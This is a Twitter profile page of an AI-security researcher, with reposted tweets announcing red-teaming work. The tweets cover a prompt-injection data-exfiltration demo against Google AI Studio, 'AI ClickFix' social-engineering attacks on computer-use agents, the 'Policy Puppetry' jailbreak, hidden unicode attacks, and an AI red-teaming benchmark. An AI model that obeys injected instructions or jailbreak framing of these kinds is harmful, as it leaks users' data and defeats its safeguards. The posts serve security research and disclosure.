Andreas (@_tsamados) 's Twitter Profile
Andreas

@_tsamados

PhD researcher on human-machine teaming @UniofOxford

I like hacking LLMs, philosophy of science, cryptography, p2p networks, direct action

ID: 1530201115039608833

linkhttps://custodians.online/ calendar_today27-05-2022 14:55:59

78 Tweet

86 Followers

115 Following

threlfall (@whitehacksec) 's Twitter Profile Photo

wiki.offsecml.com has some shiny new things; - Biagio Montaruli's adversarial phishing page generator - workarounds for Tensorflow and Keras model execution thanks Mary Walker & faceteep - hidden unicode attacks for LLMs Joseph Thacker Riley Goodside -Vishing techinques

Andreas (@_tsamados) 's Twitter Profile Photo

PSA: don't go mindlessly downloading miqu from the magnet link yet or you WILL be vulnerable to remote code execution attacks

Brendan Dolan-Gavitt (@moyix) 's Twitter Profile Photo

Absolutely stunned by this: @XBOW went head to head against experienced pentesters (one with 20 years in the field!) and solved as many challenges as the best human (88/104, 85%). I thought this moment was years away.

Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

🚨Google AI Studio continues to struggle with data exfiltration vulnerabilities ⚠️ This demo shows silent data exfiltration of employee feedback and performance reviews through prompt injection in one of the feedback entries. The POC triggers data exfiltration via rendering

Stephen Wolfram (@stephen_wolfram) 's Twitter Profile Photo

What's really going on in machine learning? Just finished a deep dive using (new) minimal models. Seems like ML is basically about fitting together lumps of computational irreducibility ... with important potential implications for science of ML, and future tech...

What's really going on in machine learning?  Just finished a deep dive using (new) minimal models.  Seems like ML is basically about fitting together lumps of computational irreducibility ... with important potential implications for science of ML, and future tech...
XBOW (@xbow) 's Twitter Profile Photo

We are now making our validation benchmarks public! We invite you to test your skills or systems against them and share your results with us. Read more in our blog post: xbow.com/blog/benchmark…

Andreas (@_tsamados) 's Twitter Profile Photo

Are you using AI agents or LLMs for hacking or in your cybersecurity work? Going to 38c3? I would love to chat! I'll be at ccc all week for my research : ) DMs open

Are you using AI agents or LLMs for hacking or in your cybersecurity work? Going to 38c3?

I would love to chat! I'll be at ccc all week for my  research : ) DMs open
Katie Paxton-Fear (@insiderphd) 's Twitter Profile Photo

This is an IMPRESSIVELY good pdf password dictionary brute forcer, got a password in literally milliseconds, if you're doing recon this is 👌 github.com/mufeedvh/pdfrip

Tom Bonner (@thomas_bonner) 's Twitter Profile Photo

Announcing our latest attack technique, "Policy Puppetry" - a single, transferable prompt blending structured policy & roleplay that bypasses alignment in frontier AI models. Game-changing for red-teaming! #AI #GenAI #RedTeam #CyberSecurity hiddenlayer.com/innovation-hub…

Andreas (@_tsamados) 's Twitter Profile Photo

Its not just the AI models that are a security nightmare, its the whole stack that comes with it (& that keeps changing)

Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

🔥 New blog post: AI ClickFix! Explores how classic ClickFix social engineering attacks can target AI agents, like Claude Computer-Use. Learn what ClickFix is, how it works in detail, and see a working proof-of-concept. Scary stuff. 👇

🔥 New blog post: AI ClickFix!

Explores how classic ClickFix social engineering attacks can target AI agents, like Claude Computer-Use.

Learn what ClickFix is, how it works in detail, and see a working proof-of-concept. Scary stuff. 👇
dreadnode (@dreadnode) 's Twitter Profile Photo

Introducing AIRTBench, an AI red teaming benchmark for evaluating language models’ ability to autonomously discover and exploit AI/ML security vulnerabilities. Read the paper on arXiv: arxiv.org/abs/2506.14682 Open-source dataset and benchmark eval code repo:

Introducing AIRTBench, an AI red teaming benchmark for evaluating language models’ ability to autonomously discover and exploit AI/ML security vulnerabilities.

Read the paper on arXiv: arxiv.org/abs/2506.14682 

Open-source dataset and benchmark eval code repo: